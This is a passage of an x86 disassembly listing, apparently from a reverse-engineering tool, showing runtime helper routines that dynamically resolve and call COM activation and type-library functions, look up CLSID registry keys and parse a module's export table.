loc_4D947F: ; CODE XREF: sub_4D93B3+C4�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 80004002h
jnz short loc_4D9498
mov [ebp+var_10], 1
jmp short loc_4D949C
; ---------------------------------------------------------------------------
loc_4D9498: ; CODE XREF: sub_4D93B3+DD�j
mov [ebp+var_14], 1
loc_4D949C: ; CODE XREF: sub_4D93B3+CA�j
; sub_4D93B3+E3�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_1C], eax
jmp loc_4D9429
; ---------------------------------------------------------------------------
loc_4D94B0: ; CODE XREF: sub_4D93B3+83�j
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax+8]
loc_4D94BB: ; CODE XREF: sub_4D93B3+6A�j
movzx eax, [ebp+var_14]
test eax, eax
jz short loc_4D94CE
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004005h
jmp short loc_4D9502
; ---------------------------------------------------------------------------
loc_4D94CE: ; CODE XREF: sub_4D93B3+10E�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_4D94E9
movzx eax, [ebp+var_10]
test eax, eax
jz short loc_4D94E9
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80012h
jmp short loc_4D9502
; ---------------------------------------------------------------------------
loc_4D94E9: ; CODE XREF: sub_4D93B3+121�j
; sub_4D93B3+129�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_4D94F9
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp short loc_4D9502
; ---------------------------------------------------------------------------
loc_4D94F9: ; CODE XREF: sub_4D93B3+13C�j
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004002h
loc_4D9502: ; CODE XREF: sub_4D93B3+119�j
; sub_4D93B3+134�j ...
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
xor eax, eax
jmp short locret_4D9516
; ---------------------------------------------------------------------------
loc_4D9511: ; CODE XREF: sub_4D93B3+29�j
mov eax, 80004005h
locret_4D9516: ; CODE XREF: sub_4D93B3+3C�j
; sub_4D93B3+15C�j
leave
retn
sub_4D93B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9518 proc near ; DATA XREF: _6:off_4E13E0�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE578
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
and [ebp+var_2C], 0
xor eax, eax
lea edi, [ebp+var_28]
stosd
stosd
mov eax, [ebp+arg_C]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
push 1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D93B3
add esp, 1Ch
test eax, eax
jl short loc_4D959A
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax], ecx
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_4D9627
; ---------------------------------------------------------------------------
loc_4D959A: ; CODE XREF: sub_4D9518+5D�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_4D95D6
push [ebp+arg_0]
call sub_4D9638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D95D6
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_4E1718 ; GetModuleHandleA
test eax, eax
jnz short loc_4D95D6
push 8
push 0
push [ebp+var_1C]
call sub_4DAE96
loc_4D95D6: ; CODE XREF: sub_4D9518+8A�j
; sub_4D9518+9C�j ...
and [ebp+var_20], 0
push offset dword_4DE5DC
push offset aCocreateinstan ; "CoCreateInstance"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4D9627
; ---------------------------------------------------------------------------
loc_4D9615: ; DATA XREF: _5:004DE580�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4D9627: ; CODE XREF: sub_4D9518+7D�j
; sub_4D9518+FB�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_4D9518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9638 proc near ; CODE XREF: sub_4D9518+8F�p
; sub_4D9789+8F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004D96A2 SIZE 0000007A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE588
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
push offset dword_4E6098
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_4E60B0, 0
jnz short loc_4D968B
push offset aAdvapi32_dll_0 ; "ADVAPI32.DLL"
push offset aRegqueryvaluea ; "RegQueryValueA"
call sub_4D9C22
pop ecx
pop ecx
mov ds:dword_4E60B0, eax
loc_4D968B: ; CODE XREF: sub_4D9638+3B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D9696
jmp short loc_4D96A2
sub_4D9638 endp
; =============== S U B R O U T I N E =======================================
sub_4D9696 proc near ; CODE XREF: sub_4D9638+57�p
; DATA XREF: _5:004DE590�o
push offset dword_4E6098
call ds:dword_4E1754 ; RtlLeaveCriticalSection
retn
sub_4D9696 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D9638
loc_4D96A2: ; CODE XREF: sub_4D9638+5C�j
push 401h
call sub_4D835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
mov [ebp+var_20], 400h
mov ecx, [ebp+var_20]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push [ebp+arg_0]
call sub_4D971C
pop ecx
lea eax, [ebp+var_20]
push eax
push [ebp+var_1C]
push offset dword_4E5F98
push 80000000h
call ds:dword_4E60B0
test eax, eax
jnz short loc_4D96FC
mov eax, [ebp+var_1C]
jmp short loc_4D970D
; ---------------------------------------------------------------------------
loc_4D96FC: ; CODE XREF: sub_4D9638+BD�j
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4D83DD
pop ecx
xor eax, eax
loc_4D970D: ; CODE XREF: sub_4D9638+C2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D9638
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D971C proc near ; CODE XREF: sub_4D9638+9E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Fh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Eh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Dh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ch]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Bh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ah]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+9]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+8]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+6]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+4]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
push offset aClsid08x04x04x ; "CLSID\\{%08x-%04x-%04x-%02x%02x-%02x%02x"...
push offset dword_4E5F98
call ds:dword_4E17D4 ; wsprintfA
add esp, 34h
pop ebp
retn
sub_4D971C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9789 proc near ; DATA XREF: _6:004E13E8�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE598
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D93B3
add esp, 1Ch
test eax, eax
jl short loc_4D97F3
push 0FFFFFFFFh
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_4D98AF
; ---------------------------------------------------------------------------
loc_4D97F3: ; CODE XREF: sub_4D9789+4D�j
and [ebp+var_20], 0
push offset dword_4DE5DC
push offset aCocreateinst_0 ; "CoCreateInstanceEx"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_4D9847
push [ebp+arg_0]
call sub_4D9638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D9847
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_4E1718 ; GetModuleHandleA
test eax, eax
jnz short loc_4D9847
push 8
push 0
push [ebp+var_1C]
call sub_4DAE96
loc_4D9847: ; CODE XREF: sub_4D9789+8A�j
; sub_4D9789+9C�j ...
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
mov [ebp+var_24], eax
and [ebp+var_28], 0
jmp short loc_4D986C
; ---------------------------------------------------------------------------
loc_4D9865: ; CODE XREF: sub_4D9789+FA�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_4D986C: ; CODE XREF: sub_4D9789+DA�j
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_10]
jnb short loc_4D9885
mov eax, [ebp+var_28]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_30], eax
jmp short loc_4D9865
; ---------------------------------------------------------------------------
loc_4D9885: ; CODE XREF: sub_4D9789+E9�j
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4D98AF
; ---------------------------------------------------------------------------
loc_4D989D: ; DATA XREF: _5:004DE5A0�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4D98AF: ; CODE XREF: sub_4D9789+65�j
; sub_4D9789+112�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_4D9789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D98C0 proc near ; DATA XREF: _6:004E13F0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE5A8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_24]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D931F
add esp, 18h
test eax, eax
jl short loc_4D9927
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp loc_4D99B4
; ---------------------------------------------------------------------------
loc_4D9927: ; CODE XREF: sub_4D98C0+4A�j
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jz short loc_4D9963
push [ebp+arg_0]
call sub_4D9638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D9963
mov [ebp+arg_4], 1
push [ebp+var_1C]
call ds:dword_4E1718 ; GetModuleHandleA
test eax, eax
jnz short loc_4D9963
push 8
push 0
push [ebp+var_1C]
call sub_4DAE96
loc_4D9963: ; CODE XREF: sub_4D98C0+6F�j
; sub_4D98C0+81�j ...
and [ebp+var_20], 0
push offset dword_4DE5DC
push offset aCogetclassobje ; "CoGetClassObject"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4D99B4
; ---------------------------------------------------------------------------
loc_4D99A2: ; DATA XREF: _5:004DE5B0�o
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4D99B4: ; CODE XREF: sub_4D98C0+62�j
; sub_4D98C0+E0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_4D98C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D99C5 proc near ; CODE XREF: sub_4D9A34+9F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 80070057h
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov eax, [ebp+arg_0]
mov eax, [eax]
push [ebp+arg_0]
call dword ptr [eax+18h]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl short loc_4D9A2F
and [ebp+var_C], 0
push offset dword_4DE5F8
push offset aGetrecordinfof ; "GetRecordInfoFromTypeInfo"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4D9A28
push [ebp+arg_8]
push [ebp+var_4]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
jmp short loc_4D9A2F
; ---------------------------------------------------------------------------
loc_4D9A28: ; CODE XREF: sub_4D99C5+48�j
mov [ebp+var_8], 80004005h
loc_4D9A2F: ; CODE XREF: sub_4D99C5+2A�j
; sub_4D99C5+61�j
mov eax, [ebp+var_8]
leave
retn
sub_4D99C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9A34 proc near ; DATA XREF: _6:off_4E13F8�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push edi
mov [ebp+var_4], 80004005h
push [ebp+arg_0]
call sub_4D2D50
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_4D9AFD
and [ebp+var_10], 0
mov edi, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_18], ecx
push 208h
call sub_4D835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
mov ecx, 82h
xor eax, eax
mov edi, [ebp+var_14]
rep stosd
push 104h
push [ebp+var_14]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
push offset dword_4DE5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_14]
call [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jl short loc_4D9AE9
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+var_10]
call sub_4D99C5
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
mov eax, [eax]
push [ebp+var_10]
call dword ptr [eax+8]
loc_4D9AE9: ; CODE XREF: sub_4D9A34+94�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4D83DD
pop ecx
mov eax, [ebp+var_4]
jmp short loc_4D9B37
; ---------------------------------------------------------------------------
loc_4D9AFD: ; CODE XREF: sub_4D9A34+1E�j
and [ebp+var_1C], 0
push offset dword_4DE5F8
push offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D9B32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
jmp short loc_4D9B37
; ---------------------------------------------------------------------------
loc_4D9B32: ; CODE XREF: sub_4D9A34+E5�j
mov eax, 80004005h
loc_4D9B37: ; CODE XREF: sub_4D9A34+C7�j
; sub_4D9A34+FC�j
pop edi
leave
retn 18h
sub_4D9A34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9B3C proc near ; DATA XREF: _6:004E1400�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_8], 80004005h
push [ebp+arg_0]
call sub_4D2D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D9BB5
push 208h
call sub_4D835A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
push 104h
push [ebp+var_10]
push 0FFFFFFFFh
push [ebp+var_4]
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
push offset dword_4DE5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_10]
push [ebp+var_10]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_4D83DD
pop ecx
loc_4D9BB5: ; CODE XREF: sub_4D9B3C+1D�j
cmp [ebp+var_8], 0
jge short loc_4D9BE4
push offset dword_4DE5F8
push offset aLoadregtypelib ; "LoadRegTypeLib"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_14], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_14]
mov [ebp+var_8], eax
loc_4D9BE4: ; CODE XREF: sub_4D9B3C+7D�j
mov eax, [ebp+var_8]
leave
retn 14h
sub_4D9B3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9BEB proc near ; CODE XREF: sub_4D9C22+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4D9C0E
push [ebp+arg_4]
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_8], eax
loc_4D9C0E: ; CODE XREF: sub_4D9BEB+15�j
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4D9BEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9C22 proc near ; CODE XREF: sub_4D58A0+16�p
; sub_4D9518+CC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D9BEB
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4D9C4F
push ds:off_4DE4F8
push 30h
push ds:off_4DE4FC
call sub_4D848C
loc_4D9C4F: ; CODE XREF: sub_4D9C22+18�j
mov eax, [ebp+var_4]
leave
retn
sub_4D9C22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9C54 proc near ; CODE XREF: _0:0041E9D9�p _0:0041E9EB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_4D9C64
mov [ebp+arg_0], offset sub_4D8C27
loc_4D9C64: ; CODE XREF: sub_4D9C54+7�j
movzx eax, ds:byte_4E60D0
test eax, eax
jnz short loc_4D9C7A
push [ebp+arg_0]
call ds:dword_4E1790 ; SetUnhandledExceptionFilter
jmp short loc_4D9C8A
; ---------------------------------------------------------------------------
loc_4D9C7A: ; CODE XREF: sub_4D9C54+19�j
push offset sub_4D8C27
call ds:dword_4E1790 ; SetUnhandledExceptionFilter
mov eax, offset sub_4D8C27
loc_4D9C8A: ; CODE XREF: sub_4D9C54+24�j
pop ebp
retn 4
sub_4D9C54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9C8E proc near ; CODE XREF: sub_4D9D79+4B�p
; sub_4D9F43+108�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
and [ebp+var_8], 0
mov eax, [ebp+arg_4]
mov eax, [eax+18h]
dec eax
mov [ebp+var_4], eax
loc_4D9CA2: ; CODE XREF: sub_4D9C8E:loc_4D9D70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jg loc_4D9D75
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+20h]
mov eax, [ebp+var_10]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_8]
mov [ebp+var_20], eax
loc_4D9CD7: ; CODE XREF: sub_4D9C8E+7B�j
mov eax, [ebp+var_20]
mov al, [eax]
mov [ebp+var_21], al
mov ecx, [ebp+var_1C]
cmp al, [ecx]
jnz short loc_4D9D11
cmp [ebp+var_21], 0
jz short loc_4D9D0B
mov eax, [ebp+var_20]
mov al, [eax+1]
mov [ebp+var_22], al
mov ecx, [ebp+var_1C]
cmp al, [ecx+1]
jnz short loc_4D9D11
add [ebp+var_20], 2
add [ebp+var_1C], 2
cmp [ebp+var_22], 0
jnz short loc_4D9CD7
loc_4D9D0B: ; CODE XREF: sub_4D9C8E+5C�j
and [ebp+var_28], 0
jmp short loc_4D9D19
; ---------------------------------------------------------------------------
loc_4D9D11: ; CODE XREF: sub_4D9C8E+56�j
; sub_4D9C8E+6D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_28], eax
loc_4D9D19: ; CODE XREF: sub_4D9C8E+81�j
mov eax, [ebp+var_28]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D9D5A
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+24h]
mov eax, [ebp+var_10]
mov ax, [ecx+eax*2]
mov [ebp+var_18], ax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+1Ch]
movzx eax, [ebp+var_18]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
jmp short locret_4D9D77
; ---------------------------------------------------------------------------
loc_4D9D5A: ; CODE XREF: sub_4D9C8E+9B�j
cmp [ebp+var_C], 0
jle short loc_4D9D69
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_8], eax
jmp short loc_4D9D70
; ---------------------------------------------------------------------------
loc_4D9D69: ; CODE XREF: sub_4D9C8E+D0�j
mov eax, [ebp+var_10]
dec eax
mov [ebp+var_4], eax
loc_4D9D70: ; CODE XREF: sub_4D9C8E+D9�j
jmp loc_4D9CA2
; ---------------------------------------------------------------------------
loc_4D9D75: ; CODE XREF: sub_4D9C8E+1A�j
xor eax, eax
locret_4D9D77: ; CODE XREF: sub_4D9C8E+CA�j
leave
retn
sub_4D9C8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9D79 proc near ; CODE XREF: sub_4D7494+97�p
; sub_4D7494+C5�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push [ebp+arg_4]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4D9D9D
push [ebp+arg_4]
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_14], eax
loc_4D9D9D: ; CODE XREF: sub_4D9D79+16�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+var_C]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
push [ebp+arg_0]
push [ebp+var_4]
push [ebp+var_C]
call sub_4D9C8E
add esp, 0Ch
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
leave
retn
sub_4D9D79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9DD4 proc near ; CODE XREF: sub_4D4DC0+12�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push offset dword_4E60B8
call ds:dword_4E174C ; InitializeCriticalSection
push offset dword_4E6098
call ds:dword_4E174C ; InitializeCriticalSection
push 28h
call sub_4D835A
pop ecx
mov [ebp+var_8], eax
